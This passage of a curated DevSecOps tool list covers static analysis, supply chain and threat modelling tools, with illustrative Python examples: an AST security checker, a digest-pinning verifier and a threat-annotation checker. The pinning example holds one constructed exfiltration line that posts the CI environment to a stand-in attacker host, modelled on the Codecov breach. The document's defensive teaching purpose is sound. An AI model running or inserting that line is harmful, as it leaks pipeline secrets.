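        if isinstance(value, ast.Constant) and isinstance(value.value, str):
            for target in node.targets:
                if isinstance(target, ast.Name) and any(w in target.id.lower() for w in SECRET_WORDS):
                    self.findings.append((node.lineno, "hardcoded-secret",
                                          f"string literal assigned to {target.id}"))
        self.generic_visit(node)

    def visit_Call(self, node):
        name = dotted_name(node.func)
        if name == "eval":
            self.findings.append((node.lineno, "eval-call", "eval() on attacker-controlled input is code execution"))
        elif name == "os.system":
            self.findings.append((node.lineno, "shell-injection", "os.system always runs through the shell"))
        elif name in WEAK_HASHES:
            self.findings.append((node.lineno, "weak-hash", f"{name} is not collision resistant"))
        elif name in SHELL_RUNNERS:
            # Only shell=True is dangerous; a grep for 'subprocess' cannot tell the two apart.
            for kw in node.keywords:
                if kw.arg == "shell" and isinstance(kw.value, ast.Constant) and kw.value.value is True:
                    self.findings.append((node.lineno, "shell-injection", f"{name} with shell=True"))
        self.generic_visit(node)


def scan_source(source):
    """Parse source and return findings sorted by line number."""
    visitor = SecurityVisitor()
    visitor.visit(ast.parse(source))
    return sorted(visitor.findings)


if __name__ == "__main__":
    for lineno, rule, message in scan_source(SAMPLE_SOURCE):
        print(f"line {lineno}: {rule}: {message}")
```

<p>The limits are the same as for the real tools: the checker sees names, not values, so <code>subprocess.call(cmd, shell=flag)</code> with a variable passes, and an aliased import (<code>import hashlib as h</code>) needs import tracking that this example omits. Semgrep and CodeQL add data-flow tracking on top of this pattern for exactly that reason.</p>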
<!-- omit in toc -->
<h4 id="multi-language-support">Multi-Language Support</h4>
<ul>
<li><a href="https://github.com/microsoft/DevSkim">DevSkim</a> -
<em>Microsoft</em> - A set of IDE plugins, CLIs and other tools that
provide security analysis for a number of programming languages.</li>
<li><a href="https://github.com/wireghoul/graudit/">Graudit</a> -
<em>Eldar Marcussen</em> - Grep source code for potential security flaws
with custom or pre-configured regex signatures.</li>
<li><a href="https://github.com/hawkeyesec/scanner-cli">Hawkeye</a> -
<em>Hawkeyesec</em> - Modularised CLI tool for project security,
vulnerability and general risk highlighting.</li>
<li><a href="https://lgtm.com/">LGTM</a> - <em>Semmle</em> - Scan and
monitor code for security vulnerabilities using custom or built-in
CodeQL queries.</li>
<li><a href="https://www.ripstech.com/">RIPS</a> - <em>RIPS
Technologies</em> - Automated static analysis for PHP, Java and Node.js
projects.</li>
<li><a href="https://semgrep.dev/">Semgrep</a> - <em>r2c</em> - Semgrep
is a fast, open-source, static analysis tool that finds bugs and
enforces code standards at editor, commit, and CI time.</li>
<li><a href="https://www.sonarlint.org/">SonarLint</a> -
<em>SonarSource</em> - An IDE plugin that highlights potential security
issues, code quality issues and bugs.</li>
<li><a href="https://www.sonarqube.org/">SonarQube</a> -
<em>SonarSource</em> - Scan code for security and quality issues with
support for a wide variety of languages.</li>
</ul>
<!-- omit in toc -->
<h4 id="c-c">C / C++</h4>
<ul>
<li><a
href="https://github.com/david-a-wheeler/flawfinder">FlawFinder</a> -
<em>David Wheeler</em> - Scan C / C++ code for potential security
weaknesses.</li>
</ul>
<!-- omit in toc -->
<h4 id="c">C#</h4>
<ul>
<li><a href="https://github.com/pumasecurity/puma-scan">Puma Scan</a> -
<em>Puma Security</em> - A Visual Studio plugin to scan .NET projects
for potential security flaws.</li>
</ul>
<!-- omit in toc -->
<h4 id="configuration-files">Configuration Files</h4>
<ul>
<li><a href="https://github.com/instrumenta/conftest">Conftest</a> -
<em>Instrumenta</em> - Create custom tests to scan any configuration
file for security flaws.</li>
<li><a href="https://github.com/selefra/selefra">Selefra</a> -
<em>Selefra</em> - An open-source policy-as-code software that provides
analytics for multi-cloud and SaaS.</li>
</ul>
<!-- omit in toc -->
<h4 id="java">Java</h4>
<ul>
<li><a href="https://discotek.ca/deepdive.xhtml">Deep Dive</a> -
<em>Discotek.ca</em> - Static analysis for JVM deployment units
including Ear, War, Jar and APK.</li>
<li><a href="https://github.com/find-sec-bugs/find-sec-bugs/">Find
Security Bugs</a> - <em>OWASP</em> - SpotBugs plugin for security audits
of Java web applications. Supports Eclipse, IntelliJ, Android Studio and
SonarQube.</li>
<li><a href="https://github.com/spotbugs/spotbugs">SpotBugs</a> -
<em>SpotBugs</em> - Static code analysis for Java applications.</li>
</ul>
<!-- omit in toc -->
<h4 id="javascript">JavaScript</h4>
<ul>
<li><a href="https://eslint.org/">ESLint</a> - <em>JS Foundation</em> -
Linting tool for JavaScript with multiple security linting rules
available.</li>
</ul>
<!-- omit in toc -->
<h4 id="go">Go</h4>
<ul>
<li><a href="https://github.com/securego/gosec">Golang Security
Checker</a> - <em>securego</em> - CLI tool to scan Go code for potential
security flaws.</li>
</ul>
<!-- omit in toc -->
<h4 id="net">.NET</h4>
<ul>
<li><a
href="https://github.com/security-code-scan/security-code-scan">Security
Code Scan</a> - <em>Security Code Scan</em> - Static code analysis for
C# and VB.NET applications.</li>
</ul>
<!-- omit in toc -->
<h4 id="php">PHP</h4>
<ul>
<li><a href="https://github.com/phan/phan">Phan</a> - <em>Phan</em> -
Broad static analysis for PHP applications with some support for
security scanning features.</li>
<li><a
href="https://github.com/FloeDesignTechnologies/phpcs-security-audit">PHPCS
Security Audit</a> - <em>Floe</em> - PHP static analysis with rules for
PHP, Drupal 7 and PHP related CVEs.</li>
<li><a href="https://github.com/designsecurity/progpilot">Progpilot</a>
- <em>Design Security</em> - Static analysis for PHP source code.</li>
</ul>
<!-- omit in toc -->
<h4 id="python">Python</h4>
<ul>
<li><a href="https://github.com/PyCQA/bandit">Bandit</a> - <em>Python
Code Quality Authority</em> - Find common security vulnerabilities in
Python code.</li>
</ul>
<!-- omit in toc -->
<h4 id="ruby">Ruby</h4>
<ul>
<li><a href="https://github.com/presidentbeef/brakeman">Brakeman</a> -
<em>Justin Collins</em> - Static analysis tool which checks Ruby on
Rails applications for security vulnerabilities.</li>
<li><a href="https://github.com/thesp0nge/dawnscanner">DawnScanner</a> -
<em>Paolo Perego</em> - Security scanning for Ruby scripts and web
applications. Supports the Ruby on Rails, Sinatra and Padrino
frameworks.</li>
</ul>
<h3 id="supply-chain-security">Supply Chain Security</h3>
<p>Supply chain attacks come in different forms, targeting parts of the
SDLC that are inherently third party: tools and actions run in CI,
dependencies and scripts fetched and executed at build time, and more.
Supply chain security tooling can defend against these kinds of attacks
by verifying what is fetched before it runs and by recording what went
into a build.</p>
<ul>
<li><a href="https://github.com/step-security/harden-runner">Harden
Runner GitHub Action</a> - <em>StepSecurity</em> - Installs a security
agent on the GitHub-hosted runner (Ubuntu VM) to prevent exfiltration of
credentials, detect compromised dependencies and build tools, and detect
tampering of source code during the build.</li>
<li><a href="https://github.com/os-scar/overlay">Overlay</a> -
<em>SCAR</em> - A browser extension helping developers evaluate open
source packages before picking them.</li>
<li><a href="https://github.com/spectralops/preflight">Preflight</a> -
<em>Spectral</em> - Helps you verify scripts and executables to mitigate
supply chain attacks in your CI and other systems, such as the 2021
<a
href="https://spectralops.io/blog/credentials-risk-supply-chain-lessons-from-the-codecov-breach/">Codecov
breach</a>.</li>
<li><a href="https://www.sigstore.dev/">Sigstore</a> - Sigstore is a set
of free-to-use, open source tools, including <a
href="https://github.com/sigstore/fulcio">fulcio</a>, <a
href="https://github.com/sigstore/cosign">cosign</a> and <a
href="https://github.com/sigstore/rekor">rekor</a>, handling the digital
signing, verification and provenance checks needed to make it safer to
distribute and use open source software.</li>
<li><a href="https://github.com/anchore/syft/">Syft</a> -
<em>Anchore</em> - A CLI tool for generating a Software Bill of
Materials (SBOM) from container images and filesystems.</li>
</ul>
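<p>An added example (not code from this page, from Preflight or from Sigstore) of the simplest defence the Preflight entry describes: pin the digest of every script the pipeline downloads and refuse to run anything that does not match. The script contents, hostnames and pins are constructed for the example. The tampered copy mimics the shape of the Codecov incident, in which a line that shipped the CI environment variables to an attacker-controlled host was added to a legitimately fetched uploader script.</p>

```python
import hashlib
import hmac


class VerificationError(Exception):
    pass


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def verify(name, data, pins):
    """Raise VerificationError unless data matches the pinned digest for name.
    Returns the verified hex digest so it can be logged with the build."""
    expected = pins.get(name)
    if expected is None:
        raise VerificationError(f"{name}: no pinned digest, refusing to run unreviewed code")
    actual = sha256_hex(data)
    # compare_digest avoids leaking the mismatch position through timing;
    # not critical for a public hash, but it is the habit worth keeping.
    if not hmac.compare_digest(actual, expected):
        raise VerificationError(f"{name}: digest {actual} does not match pin {expected}")
    return actual


def may_execute(name, data, pins):
    """True only when the fetched artifact matches its pin."""
    try:
        verify(name, data, pins)
        return True
    except VerificationError:
        return False


# Constructed artifacts for the example. In a real pipeline the pin is
# computed once, reviewed, committed beside the pipeline definition and
# only changed in a pull request when the upstream script changes.
KNOWN_GOOD_SCRIPT = b"#!/bin/sh\nset -e\ncurl -sS https://example.invalid/upload -d @coverage.xml\n"
PINS = {"upload.sh": sha256_hex(KNOWN_GOOD_SCRIPT)}

# The shape of the Codecov tampering: the legitimate script with one line
# added that ships the CI environment (and every secret in it) elsewhere.
TAMPERED_SCRIPT = KNOWN_GOOD_SCRIPT + b"curl -sS http://attacker.invalid/ -d \"$(env)\"\n"

if __name__ == "__main__":
    for label, data in (("pristine", KNOWN_GOOD_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        print(f"{label}: {'run' if may_execute('upload.sh', data, PINS) else 'refuse'}")
```

<p>Pinning by digest is what makes a <code>curl ... | bash</code> step reviewable: when the upstream script changes, the pin changes in a pull request and the new content can be diffed before anyone trusts it. Signature verification in the Sigstore style removes the need to update pins by hand, at the cost of a trust root that must be managed.</p>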
<h3 id="threat-modelling">Threat Modelling</h3>
<p>Threat modelling is an engineering exercise that aims to identify
threats, vulnerabilities and attack vectors that represent a risk to
something of value. Based on this understanding of threats, we can
design, implement and validate security controls to mitigate them.
The following tools assist the threat modelling process.</p>
<ul>
<li><a
href="https://github.com/hysnsec/awesome-threat-modelling">Awesome
Threat Modelling</a> - <em>Practical DevSecOps</em> - A curated list of
threat modelling resources.</li>
<li><a href="https://www.foreseeti.com/">SecuriCAD</a> -
<em>foreseeti</em> - Threat modelling and attack simulations for IT
infrastructure.</li>
<li><a href="https://iriusrisk.com/">IriusRisk</a> - <em>IriusRisk</em>
- Draw threat models, capture threats and countermeasures, and manage
risk.</li>
<li><a href="https://github.com/devsecops/raindance">Raindance
Project</a> - <em>DevSecOps</em> - Use attack maps to identify attack
surface and adversary strategies that may lead to compromise.</li>
<li><a
href="https://www.securitycompass.com/sdelements/threat-modeling/">SD
Elements</a> - <em>Security Compass</em> - Identify and rank threats,
generate actionable tasks and track related tickets.</li>
<li><a href="https://owasp.org/www-project-threat-dragon/">Threat
Dragon</a> - <em>OWASP</em> - Threat model diagramming tool.</li>
<li><a
href="https://www.microsoft.com/en-us/securityengineering/sdl/threatmodeling">Threat
Modeling Tool</a> - <em>Microsoft</em> - Threat model diagramming
tool.</li>
<li><a href="https://threatspec.org/">Threatspec</a> -
<em>Threatspec</em> - Define threat modelling as code.</li>
</ul>
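<p>An added example of the threat-modelling-as-code idea behind Threatspec, written for this page rather than taken from Threatspec (its own annotation syntax is richer and is not reproduced here; the <code>@threat</code> / <code>@mitigates</code> comment format, the threat IDs and the sample sources below are assumptions made for the example). Threats and their mitigations live as comments next to the code they describe, so they are reviewed with the code, and a CI step fails the build when a declared threat has no mitigation or a mitigation refers to a threat nobody declared.</p>

```python
import re
import sys

# Annotation format assumed for this example (Threatspec's own syntax is
# richer; this is a minimal stand-in): a comment anywhere in the source
# declares a threat, and another comment records its mitigation.
THREAT_RE = re.compile(r"@threat\s+(?P<id>[A-Z]+\d+):\s*(?P<desc>.+)")
MITIGATES_RE = re.compile(r"@mitigates\s+(?P<id>[A-Z]+\d+):\s*(?P<desc>.+)")

# Constructed sources for the example; T3 is deliberately left open.
SOURCES = {
    "search.py": '''
# @threat T1: SQL injection via the q parameter
# @mitigates T1: parameterised query, never string formatting
def search(db, q):
    return db.execute("SELECT id FROM items WHERE name = ?", (q,))
''',
    "upload.py": '''
# @threat T2: path traversal in the uploaded file name
# @threat T3: unbounded upload size exhausts disk
# @mitigates T2: basename() strips directory components
def save(path, data):
    ...
''',
}


def collect(sources):
    """Walk every file and return ({id: (desc, location)}, {id: [(desc, location), ...]})."""
    threats, mitigations = {}, {}
    for filename, text in sources.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            where = f"{filename}:{lineno}"
            m = THREAT_RE.search(line)
            if m:
                threats[m["id"]] = (m["desc"].strip(), where)
                continue
            m = MITIGATES_RE.search(line)
            if m:
                mitigations.setdefault(m["id"], []).append((m["desc"].strip(), where))
    return threats, mitigations


def unmitigated(sources):
    """Threat IDs declared without any @mitigates; these fail the build."""
    threats, mitigations = collect(sources)
    return sorted(t for t in threats if t not in mitigations)


def dangling(sources):
    """Mitigations pointing at a threat nobody declared (a typo or a deleted threat)."""
    threats, mitigations = collect(sources)
    return sorted(t for t in mitigations if t not in threats)


def report(sources):
    """Human-readable threat register built from the annotations."""
    threats, mitigations = collect(sources)
    lines = []
    for tid, (desc, where) in sorted(threats.items()):
        status = "mitigated" if tid in mitigations else "OPEN"
        lines.append(f"{tid} [{status}] {desc} ({where})")
        for mdesc, mwhere in mitigations.get(tid, []):
            lines.append(f"    mitigated by: {mdesc} ({mwhere})")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SOURCES))
    problems = unmitigated(SOURCES) + dangling(SOURCES)
    sys.exit(1 if problems else 0)  # fail CI on open or dangling items
```

<p>The register this produces is only as good as the annotations, so the useful CI rule is the negative one: a pull request that adds a <code>@threat</code> without a matching <code>@mitigates</code> (or an explicit accepted-risk marker, which this example does not model) cannot merge.</p>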
<h2 id="related-lists">Related Lists</h2>
<ul>
<li><a
href="https://github.com/analysis-tools-dev/dynamic-analysis/">Awesome
Dynamic Analysis</a> - <em>Matthias Endler</em> - A collection of
dynamic analysis tools and code quality checkers.</li>
<li><a
href="https://github.com/shospodarets/awesome-platform-engineering/">Awesome
Platform Engineering</a> - A curated list of solutions, tools and
resources for <em>Platform Engineering</em>.</li>
<li><a
href="https://github.com/analysis-tools-dev/static-analysis/">Awesome
Static Analysis</a> - <em>Matthias Endler</em> - A collection of static
analysis tools and code quality checkers.</li>
<li><a
href="https://github.com/hysnsec/awesome-threat-modelling">Awesome
Threat Modelling</a> - <em>Practical DevSecOps</em> - A curated list of
threat modelling resources.</li>
<li><a
href="https://owasp.org/www-project-vulnerable-web-applications-directory">Vulnerable
Web Apps Directory</a> - <em>OWASP</em> - A collection of vulnerable web
applications for learning purposes.</li>
</ul>
<p><a href="https://github.com/TaptuIT/awesome-devsecops">devsecops.md
Github</a></p>